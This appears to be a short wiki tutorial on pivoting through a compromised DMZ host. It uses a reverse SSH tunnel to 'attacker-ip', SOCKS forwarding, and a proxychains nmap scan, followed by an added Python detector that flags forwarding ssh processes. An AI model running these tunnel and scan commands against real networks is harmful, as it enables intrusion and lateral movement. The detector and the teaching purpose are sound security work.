Proxychains
lethanhtung01011980 edited this page Dec 23, 2019 · 13 revisions
- Complements dynamic port forwarding.
- Runs any network tool through HTTP, SOCKS4, and SOCKS5 proxies.
- Attacker traffic ====> port 8080 on attacker PC =====> reverse SSH tunnel =======> auto-selected port on victim PC (based on application protocol).
To check for listening ports:

```
netstat -lntp
```
On the victim DMZ PC, create a reverse SSH tunnel from the compromised DMZ PC (port 22) to the attacker PC (port 2222):

```
ssh -f -N root@attacker-ip -R 2222:127.0.0.1:22
```
- Port 2222 is the listening port on the attacker PC.
- -f: Run in the background.
- -N: Do not execute a remote command; used for port forwarding only.
- -R: Reverse (remote) port forwarding.
On the attacker PC, create dynamic port forwarding from port 8080 to the SSH tunnel at port 2222:

```
ssh -f -N -D 127.0.0.1:8080 -p 2222 victim-DMZ-user@127.0.0.1
```
On the attacker PC, use proxychains to reach the whole DMZ network:

```
proxychains nmap --top-ports=20 -sT -Pn 172.16.40.0/24
```
- proxychains sends the tool's traffic to port 8080, where the `ssh -D` listener accepts it.
- The SSH tunnel acts as a SOCKS server.
- 172.16.40.0/24 is a sample DMZ network.
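
From the defender's side, both tunnels above are ordinary `ssh` client processes whose forwarding flags are visible in a process listing. The following is an added example, not part of the original wiki page: it parses `ps -eo pid,user,args` output and reports `ssh` clients that request `-R`, `-D` or `-L` forwarding. The sample listing, the function name and the option string (adapted from OpenSSH's client and varying by version) are assumptions.

```python
import getopt
import shlex

# Assumed OpenSSH client option string (a ':' marks an option that takes a
# value); it differs slightly between OpenSSH versions.
SSH_OPTS = "1246ab:c:e:fgi:kl:m:no:p:qstvxAB:CD:E:F:GI:J:KL:MNO:PQ:R:S:TVw:W:XYy"
FORWARD_FLAGS = {"-R": "reverse", "-D": "dynamic (SOCKS)", "-L": "local"}

# Constructed sample of `ps -eo pid,user,args` output; PIDs and users are made up.
SAMPLE_PS = """\
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 4471 www-data ssh -f -N root@attacker-ip -R 2222:127.0.0.1:22
 4502 alice    ssh -p 22 alice@10.0.0.5
 4630 bob      /usr/bin/ssh -fND 127.0.0.1:8080 -p 2222 victim-DMZ-user@127.0.0.1
"""

def find_ssh_forwards(ps_output):
    """Return one finding per ssh client process that requests port forwarding."""
    findings = []
    for line in ps_output.splitlines():
        fields = line.split(None, 2)
        if len(fields) < 3 or not fields[0].isdigit():
            continue  # header or malformed line
        pid, user, args = fields
        try:
            argv = shlex.split(args)
        except ValueError:
            continue  # unbalanced quotes in the command line
        if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
            continue  # only the ssh client, not sshd or other tools
        try:
            # gnu_getopt also accepts options placed after the host name
            opts, rest = getopt.gnu_getopt(argv[1:], SSH_OPTS)
        except getopt.GetoptError:
            continue  # arguments that do not parse as ssh options
        forwards = [(FORWARD_FLAGS[o], v) for o, v in opts if o in FORWARD_FLAGS]
        if forwards:
            flags = {o for o, _ in opts}
            findings.append({
                "pid": int(pid), "user": user,
                "destination": rest[0] if rest else None,
                "forwards": forwards,
                # -f (background) together with -N (no command): tunnel-only session
                "tunnel_only": {"-N", "-f"} <= flags,
            })
    return findings
```

On the DMZ host itself only the `-R` process would appear; the `-D` line is included to show that combined flags such as `-fND` are parsed as well.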